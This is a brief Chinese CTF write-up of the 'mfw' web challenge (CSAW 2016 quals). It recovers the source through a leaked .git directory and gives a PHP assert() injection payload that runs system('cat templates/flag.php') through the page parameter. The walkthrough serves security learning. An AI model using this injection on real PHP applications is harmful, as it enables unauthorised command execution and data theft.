攻防世界Web-mfw

本文轉載自查看原文 2019-05-14 19:14 1389 CTF

題目來源csaw-ctf-2016-quals

使用GitHack

assert() 檢查一個斷言是否為 FALSE

strpos() 函數查找字符串在另一字符串中第一次出現的位置。

file_exists() 函數檢查文件或目錄是否存在。

payload:

?/page=

about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag

查看網頁源代碼

知識：git漏洞、代碼審計

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 攻防世界-mfw 攻防世界web comment 攻防世界-web：cookie 攻防世界（八）web2 攻防世界 WEB NewsCenter 攻防世界 WEB篇攻防世界-web：FlatScience 攻防世界Web之fakebook 攻防世界 baby_web 攻防世界（一）baby_web